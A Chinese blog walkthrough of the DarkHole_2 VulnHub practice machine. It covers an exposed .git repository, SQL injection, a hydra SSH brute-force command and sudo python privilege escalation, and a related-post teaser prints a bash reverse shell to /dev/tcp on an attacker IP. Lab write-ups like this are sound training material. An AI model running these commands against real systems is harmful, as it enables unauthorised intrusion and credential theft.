darkhole_2靶机打靶过程及思路

已于 2022-07-22 18:18:09 修改
阅读量575 收藏 1
点赞数
文章标签: git SQL注入 ssh 提权 root权限
于 2022-06-25 15:07:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52610024/article/details/125459652
版权

1.常规端口及服务发现,发现存在一个git库

2.访问80端口的.git目录,使用wget直接将git库下载下阿里
wget -r ip

3.查看该文件夹内容,提示倒数第二个版本下加入了一些身份信息,访问这些身份信息
git checkout 哈希值
再次查看login.php,里面存在默认用户名和密码,回到首页登录成功,成功进入后台

4.发现后台页面url地址上有id=1,推测存在sql注入,手工进行union联合注入,得到账号密码

5.ssh登录成功,突破外围拿下shell,开始进行提权

6.使用3493进行提权失败,查看账号目录下的.bash_history,提示发现命令执行,且提示开放了9999
端口,ss -pantu | grep 9999 发现确实存在,ps -ef | grep 9999 发现在/opt/web目录下就是被入侵的路径
,访问该路径,成功执行命令,执行反弹语句,成功拿到losy账号权限

7.发现该账号的命令执行历史记录下提示存在该账号存在sudo权限,输入history记录下的密码,成功执行
sudo直接尝试python提权语句
sudo python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
成功得到root账号的权限

8.尝试利用第二种提权方法进行提权
思考到passwd下还存在lama账号,使用MidPwds.txt 字典进行ssh进行暴力破解
hydra -l lama -P MidPwds.txt ssh://10.1.8.154 破解得到密码123
ssh登录成功进入lama账号
查看.bash_history 发现也存在sudo权限,且可以直接执行
sudo su直接拿到root权限,打靶完成

zsszjybb
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3828
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
DarkHole_2打靶记录
wwd180的博客
06-14 185
实验主机:攻击机kali 靶机DarkHole实验目标:取得 root 权限 + 2 Flag实验网络:桥接模式。
VulnHub靶机渗透实战8-darkhole-2
随心所欲不逾矩
11-22 1362
在历史命令记录中: wget 下载了一个 反弹shell,那我们也要来反弹shell,传shell到靶机上。看到第2次更新时,login.php使用了默认凭证。看到 and id =1,做了防sql注入,那是不是代表登入进去之后就存在sql注入了。因此,我们将 HEAD 切换到该提交,并查看login.php,在这里我们就已经发现账号密码了。history查看一下,losy用户的密码是:gang.网络模式的话,我喜欢用桥接,直接桥接。邮箱账户:lush@admin.com,密码:321.
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 1099
VulnHub-DarkHole: 2靶机详细渗透过程
.git文件泄露的一次渗透darkhole2
tpaer的博客
10-03 1174
这是一个困难难度的靶场,通过不小心泄露的.git文件收集信息,再利用漏洞脱库登录,最后利用rce漏洞进行提权。也可以用通用来打。
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
t6AdmX_new靶机
08-03
t6AdmX_new靶机
新版PHPStudy可用sqli_labs 靶机.zip
03-01
在新版PHPStudy中可以使用的sqli_labs SQL注入靶机。 直接解压压缩包,然后把安装包放在WWW根目录下。 找到\phpstudy_pro\WWW\Sqli_Edited_Version-master\sqlilabs\sql-connections找到这个目录下的db-creds.inc ...
安装部署Web安全测试用的靶机
11-24
同样地,MCIR、Pikachu、mutillidae和BWAPP的安装过程类似,主要包括创建虚拟主机、配置数据库连接、初始化数据库以及调整访问权限。例如,MCIR的数据库配置在database.config.php文件中,而Pikachu的配置在inc/...
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
DarkHole_2
追求卓越,技术流~
01-14 1521
文章目录靶机环境一、信息收集二、 漏洞利用三、权力提升总结 靶机环境 攻击机:kali IP:192.168.247.129 靶机DarkHole_2 IP:192.168.247.131 一、信息收集 输入:nmap -A -T4 -sV -p- 192.168.247.131 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST Nmap scan report for 192.168.247.131 Host is u
靶机渗透练习45-DarkHole-2
hirak0的博客
04-19 2063
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Forc 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.143 注:靶机与K
vuluhub-darkhole2 打靶记录
lcc001114的博客
06-14 197
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
WIFI密码之密码字典
热门推荐
ybb_ymm的专栏
07-30 1万+
WIFI密码之密码字典 生成wifi密码字典
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8387
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
my share source
最新发布
08-15
my share source
毕业设计asp.net学生评教系统-qkrp源码含文档工具包
08-15
毕业设计asp.net学生评教系统-qkrp源码含文档工具包 asp.net,数据库sqlserver,开发工具用Microsoft Visual Studio 管理员登录 学生管理 添加 管理 教师管理 添加 管理 学院管理员 添加 管理 教务管理 得分统计 考核统计 意见汇总 包含:源码、数据库脚本、论文、环境工具包(在说明文档中)
Autologging-0.4.0-py2.py3-none-any.whl.zip
08-15
Autologging-0.4.0-py2.py3-none-any.whl.zip
基于springboot的抗疫物资管理系统 源码+数据库(毕业设计)
08-15
基于Vue.js和SpringBoot的抗疫物资管理系统是一个高效、易用的物资管理解决方案,它分为管理后台和用户网页端,支持管理员和普通用户两种角色。系统主要功能包括物资分类、物资信息管理、物资出入库记录、物资资讯发布和公告管理模块。管理员可以通过后台对物资进行分类、添加、编辑和删除,同时对物资的出入库进行详细记录,确保物资的准确性和可追溯性。普通用户可以在网页端查看物资信息、资讯和公告,了解抗疫物资的最新动态。整个系统采用前后端分离的架构,前端使用Vue.js进行开发,后端使用SpringBoot框架,保证了系统的稳定性和可扩展性。 录屏:https://www.bilibili.com/video/BV17K421x7hn 教程:https://space.bilibili.com/417412814/channel/collectiondetail?sid=2242844
t6AdmX_new靶机:全方位安全探测与WordPress漏洞挖掘
在整个过程中,用户以专业的方法运用t6AdmX_new靶机,不仅关注基础的网络通信,还关注动态行为分析,确保在安全测试中能够全面评估目标系统的脆弱性和安全性。同时,注意遵守道德准则,确保测试活动在合法范围内进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值